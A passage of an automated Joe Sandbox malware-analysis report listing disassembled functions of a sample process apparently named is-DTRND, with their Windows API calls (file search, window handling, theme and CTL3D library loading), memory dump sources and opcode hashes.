                                          • Instruction Fuzzy Hash: FA017C30B843805EE710BB25CD4ABD727899B09308F4445BFB80A9BBA2EF7C8C41870C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,0045CE78), ref: 0045CDFC
                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0045CE58,?,00000000,?,00000000,0045CE78), ref: 0045CE38
                                          • FindClose.KERNEL32(000000FF,0045CE5F,0045CE58,?,00000000,?,00000000,0045CE78), ref: 0045CE52
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Find$File$CloseFirstNext
                                          • String ID:
                                          • API String ID: 3541575487-0
                                          • Opcode ID: db52346ee326165819e288216a2168ba8f477c14be2641a93cd345d5abfd7dde
                                          • Instruction ID: 01286ba5e2f2dc1a8f3fd0daa9b101753f990c57140b8ec26d21c01e98d437ca
                                          • Opcode Fuzzy Hash: db52346ee326165819e288216a2168ba8f477c14be2641a93cd345d5abfd7dde
                                          • Instruction Fuzzy Hash: 3321D571504748AEDB21DB65CC82ADEBBBCDB49715F5044F7B808E22A2D63C5E48CA68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsIconic.USER32(?), ref: 004242AC
                                          • SetActiveWindow.USER32(?,?,?,00465D23), ref: 004242B9
                                            • Part of subcall function 00423714: ShowWindow.USER32(00410718,00000009,?,00000000,0041EE6C,00423A02,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 0042372F
                                            • Part of subcall function 00423BDC: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021E2410,004242D2,?,?,?,00465D23), ref: 00423C17
                                          • SetFocus.USER32(00000000,?,?,?,00465D23), ref: 004242E6
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Window$ActiveFocusIconicShow
                                          • String ID:
                                          • API String ID: 649377781-0
                                          • Opcode ID: 525cc6e08a8bceea2193b1f85de86759ce4ac8d020da746bb49d1ed5d9845e83
                                          • Instruction ID: a1f033c8e576e22cefe5ec6a563bc8c5ffa65d0d10626093fa9beda1e522a0d9
                                          • Opcode Fuzzy Hash: 525cc6e08a8bceea2193b1f85de86759ce4ac8d020da746bb49d1ed5d9845e83
                                          • Instruction Fuzzy Hash: 3FF0D0717001104BCB10FFAAD885B9A23A8AF48305B5541BBBC49DF25BD67CDC018768
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsIconic.USER32(?), ref: 00417DD7
                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417DF5
                                          • GetWindowPlacement.USER32(?,0000002C), ref: 00417E2B
                                          • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417E52
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Window$Placement$Iconic
                                          • String ID:
                                          • API String ID: 568898626-0
                                          • Opcode ID: dc58d66978c6618ff13ac97b2135afa658c4e4a3005f0a2fe000ae6168c5a40b
                                          • Instruction ID: 30cacb2419379e21ad62ac75053296c38e5df2c0c88bcfe5efa0be9826c6abaa
                                          • Opcode Fuzzy Hash: dc58d66978c6618ff13ac97b2135afa658c4e4a3005f0a2fe000ae6168c5a40b
                                          • Instruction Fuzzy Hash: 00012131204108A7CB10EE69DCC1EE777ACAF44324F65456AFD19DF246DA35DC9087A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CaptureIconic
                                          • String ID:
                                          • API String ID: 2277910766-0
                                          • Opcode ID: 71f45d83057601ef7c9972d8b124dc0c79a2ac31caeb3e9c2b7b1a9b94684ccc
                                          • Instruction ID: e2c853b8e7d03f8f643d1a4b758c0cccdc63e7ffcba8e606f1134375ce5c50b7
                                          • Opcode Fuzzy Hash: 71f45d83057601ef7c9972d8b124dc0c79a2ac31caeb3e9c2b7b1a9b94684ccc
                                          • Instruction Fuzzy Hash: 1DF03131304E1147D7209B2EC885AA776F49F44368B14443FE415CB7A1EB6DDCC58758
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • IsIconic.USER32(?), ref: 00424263
                                            • Part of subcall function 00423B4C: EnumWindows.USER32(00423AE4), ref: 00423B70
                                            • Part of subcall function 00423B4C: GetWindow.USER32(?,00000003), ref: 00423B85
                                            • Part of subcall function 00423B4C: GetWindowLongA.USER32 ref: 00423B94
                                            • Part of subcall function 00423B4C: SetWindowPos.USER32(00000000,$BB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,00424273,?,?,00423E3B), ref: 00423BCA
                                          • SetActiveWindow.USER32(?,?,?,00423E3B,00000000,00424224), ref: 00424277
                                            • Part of subcall function 00423714: ShowWindow.USER32(00410718,00000009,?,00000000,0041EE6C,00423A02,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 0042372F
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Window$ActiveEnumIconicLongShowWindows
                                          • String ID:
                                          • API String ID: 2671590913-0
                                          • Opcode ID: aaaddde6ee2b305b5243f3db384bc4cc68d29bade52947bdfcd5501e18dbe071
                                          • Instruction ID: c189c6313aa840117835aae4f110270c77ee590bde57f011389e38c63b543ebb
                                          • Opcode Fuzzy Hash: aaaddde6ee2b305b5243f3db384bc4cc68d29bade52947bdfcd5501e18dbe071
                                          • Instruction Fuzzy Hash: 12E01AA130022087DB00AFAAD8C4B9672A9BB88305F5541BABD08DF28BD63CDC008738
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0041289D), ref: 0041288B
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: NtdllProc_Window
                                          • String ID:
                                          • API String ID: 4255912815-0
                                          • Opcode ID: e3fcff2c66ec7f6e757c4ae7fef65e8f873ebdf0c45899a4688c3efbbcf21d8a
                                          • Instruction ID: 36b9d0047ee0a29776eabb05bf093a7c0386881185b34e0cb4d9ddd626c11e39
                                          • Opcode Fuzzy Hash: e3fcff2c66ec7f6e757c4ae7fef65e8f873ebdf0c45899a4688c3efbbcf21d8a
                                          • Instruction Fuzzy Hash: 1651F5316046058BD714EF6AD681A9BF3E1FF94314B2086BBD814D3761E7B8ED92CB48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.376235403.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.376198453.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000004.00000002.376251639.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_10000000_is-DTRND.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                          • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                          • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                          • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.376235403.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000004.00000002.376198453.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000004.00000002.376251639.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_10000000_is-DTRND.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                          • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                          • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0044B2BC: GetVersionExA.KERNEL32(00000094), ref: 0044B2D9
                                          • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F419,0048B7A2), ref: 0044B337
                                          • 6CAD5550.KERNEL32(00000000,OpenThemeData,uxtheme.dll,?,0044F419,0048B7A2), ref: 0044B34F
                                          • 6CAD5550.KERNEL32(00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,?,0044F419,0048B7A2), ref: 0044B361
                                          • 6CAD5550.KERNEL32(00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,?,0044F419,0048B7A2), ref: 0044B373
                                          • 6CAD5550.KERNEL32(00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,?,0044F419,0048B7A2), ref: 0044B385
                                          • 6CAD5550.KERNEL32(00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,?,0044F419,0048B7A2), ref: 0044B397
                                          • 6CAD5550.KERNEL32(00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll,?,0044F419,0048B7A2), ref: 0044B3A9
                                          • 6CAD5550.KERNEL32(00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData,uxtheme.dll), ref: 0044B3BB
                                          • 6CAD5550.KERNEL32(00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData,00000000,OpenThemeData), ref: 0044B3CD
                                          • 6CAD5550.KERNEL32(00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground,00000000,CloseThemeData), ref: 0044B3DF
                                          • 6CAD5550.KERNEL32(00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText,00000000,DrawThemeBackground), ref: 0044B3F1
                                          • 6CAD5550.KERNEL32(00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect,00000000,DrawThemeText), ref: 0044B403
                                          • 6CAD5550.KERNEL32(00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect,00000000,GetThemeBackgroundContentRect), ref: 0044B415
                                          • 6CAD5550.KERNEL32(00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize,00000000,GetThemeBackgroundContentRect), ref: 0044B427
                                          • 6CAD5550.KERNEL32(00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent,00000000,GetThemePartSize), ref: 0044B439
                                          • 6CAD5550.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics,00000000,GetThemeTextExtent), ref: 0044B44B
                                          • 6CAD5550.KERNEL32(00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion,00000000,GetThemeTextMetrics), ref: 0044B45D
                                          • 6CAD5550.KERNEL32(00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground,00000000,GetThemeBackgroundRegion), ref: 0044B46F
                                          • 6CAD5550.KERNEL32(00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge,00000000,HitTestThemeBackground), ref: 0044B481
                                          • 6CAD5550.KERNEL32(00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon,00000000,DrawThemeEdge), ref: 0044B493
                                          • 6CAD5550.KERNEL32(00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined,00000000,DrawThemeIcon), ref: 0044B4A5
                                          • 6CAD5550.KERNEL32(00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent,00000000,IsThemePartDefined), ref: 0044B4B7
                                          • 6CAD5550.KERNEL32(00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor,00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B4C9
                                          • 6CAD5550.KERNEL32(00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric,00000000,GetThemeColor), ref: 0044B4DB
                                          • 6CAD5550.KERNEL32(00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString,00000000,GetThemeMetric), ref: 0044B4ED
                                          • 6CAD5550.KERNEL32(00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool,00000000,GetThemeString), ref: 0044B4FF
                                          • 6CAD5550.KERNEL32(00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt,00000000,GetThemeBool), ref: 0044B511
                                          • 6CAD5550.KERNEL32(00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue,00000000,GetThemeInt), ref: 0044B523
                                          • 6CAD5550.KERNEL32(00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition,00000000,GetThemeEnumValue), ref: 0044B535
                                          • 6CAD5550.KERNEL32(00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont,00000000,GetThemePosition), ref: 0044B547
                                          • 6CAD5550.KERNEL32(00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect,00000000,GetThemeFont), ref: 0044B559
                                          • 6CAD5550.KERNEL32(00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins,00000000,GetThemeRect), ref: 0044B56B
                                          • 6CAD5550.KERNEL32(00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList,00000000,GetThemeMargins), ref: 0044B57D
                                          • 6CAD5550.KERNEL32(00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin,00000000,GetThemeIntList), ref: 0044B58F
                                          • 6CAD5550.KERNEL32(00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme,00000000,GetThemePropertyOrigin), ref: 0044B5A1
                                          • 6CAD5550.KERNEL32(00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename,00000000,SetWindowTheme), ref: 0044B5B3
                                          • 6CAD5550.KERNEL32(00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor,00000000,GetThemeFilename), ref: 0044B5C5
                                          • 6CAD5550.KERNEL32(00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush,00000000,GetThemeSysColor), ref: 0044B5D7
                                          • 6CAD5550.KERNEL32(00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool,00000000,GetThemeSysColorBrush), ref: 0044B5E9
                                          • 6CAD5550.KERNEL32(00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize,00000000,GetThemeSysBool), ref: 0044B5FB
                                          • 6CAD5550.KERNEL32(00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont,00000000,GetThemeSysSize), ref: 0044B60D
                                          • 6CAD5550.KERNEL32(00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString,00000000,GetThemeSysFont), ref: 0044B61F
                                          • 6CAD5550.KERNEL32(00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt,00000000,GetThemeSysString), ref: 0044B631
                                          • 6CAD5550.KERNEL32(00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive,00000000,GetThemeSysInt), ref: 0044B643
                                          • 6CAD5550.KERNEL32(00000000,GetCurrentThemeName,00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed,00000000,IsThemeActive), ref: 0044B655
                                          • 6CAD5550.KERNEL32(00000000,GetThemeDocumentationProperty,00000000,GetCurrentThemeName,00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme,00000000,IsAppThemed), ref: 0044B667
                                          • 6CAD5550.KERNEL32(00000000,DrawThemeParentBackground,00000000,GetThemeDocumentationProperty,00000000,GetCurrentThemeName,00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture,00000000,GetWindowTheme), ref: 0044B679
                                          • 6CAD5550.KERNEL32(00000000,EnableTheming,00000000,DrawThemeParentBackground,00000000,GetThemeDocumentationProperty,00000000,GetCurrentThemeName,00000000,SetThemeAppProperties,00000000,GetThemeAppProperties,00000000,IsThemeDialogTextureEnabled,00000000,EnableThemeDialogTexture), ref: 0044B68B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: D5550$LibraryLoadVersion
                                          • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                          • API String ID: 2731847445-2910565190
                                          • Opcode ID: 098f4700c2907fc1554ba32b0b08b5dba202583cdd5cf764a44ad359fd220b82
                                          • Instruction ID: 242e7e21fa825da25f81ac783cc841e04e5882cfc85cca0ddc461d149a585560
                                          • Opcode Fuzzy Hash: 098f4700c2907fc1554ba32b0b08b5dba202583cdd5cf764a44ad359fd220b82
                                          • Instruction Fuzzy Hash: 9691F6B0E41B25ABEB00AFB598D6E2E37A8EB057147500E7AB404EF295D778D8008F5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetVersion.KERNEL32(?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F1EE
                                          • SetErrorMode.KERNEL32(00008000,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F20A
                                          • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F216
                                          • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F224
                                          • 6CAD5550.KERNEL32(00000001,Ctl3dRegister,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F254
                                          • 6CAD5550.KERNEL32(00000001,Ctl3dUnregister,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F27D
                                          • 6CAD5550.KERNEL32(00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F292
                                          • 6CAD5550.KERNEL32(00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F2A7
